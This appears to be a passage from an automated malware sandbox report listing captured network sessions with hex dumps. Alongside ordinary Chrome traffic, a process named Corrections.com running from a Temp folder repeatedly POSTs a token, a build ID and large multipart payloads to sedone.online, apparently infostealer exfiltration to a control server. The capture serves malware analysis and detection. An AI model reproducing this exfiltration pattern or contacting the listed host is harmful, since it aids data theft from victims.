                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Data Ascii: 03dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?vo
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77
                                                                                                                                                                                                                                                  Data Ascii: a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOw


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49816 | 142.250.181.100 | 443 | 4092 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:23 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
2024-12-17 16:29:24 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:23 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
2024-12-17 16:29:24 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-17 16:29:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49833 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:27 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----2NY5P8Q9RQIMYUSJEU3W
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 505
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:27 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------2NY5P8Q9RQIMYUSJEU3WContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------2NY5P8Q9RQIMYUSJEU3WContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------2NY5P8Q9RQIMYUSJEU3WCont
2024-12-17 16:29:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:28 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-12-17 16:29:28 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49843 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:28 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----OZCB1D2NOP8QIEKFKFK6
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 213453
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------OZCB1D2NOP8QIEKFKFK6Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------OZCB1D2NOP8QIEKFKFK6Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------OZCB1D2NOP8QIEKFKFK6Cont
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 16:29:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49844 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:29 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFUSRIECT2VAAAIM79H4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:31 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49855 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:32 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IE3E3OPZUA1N7YU3OPH4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 16:29:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-12-17 16:29:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49856 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:33 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAIE3WB
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-17 16:29:33 UTC | 493 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 35 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------MY58GDTJM7GVAAAIE3WBCont
2024-12-17 16:29:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
2024-12-17 16:29:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49866 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:37 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----TJWTR1VSJEKF37YUA168
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 169765
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
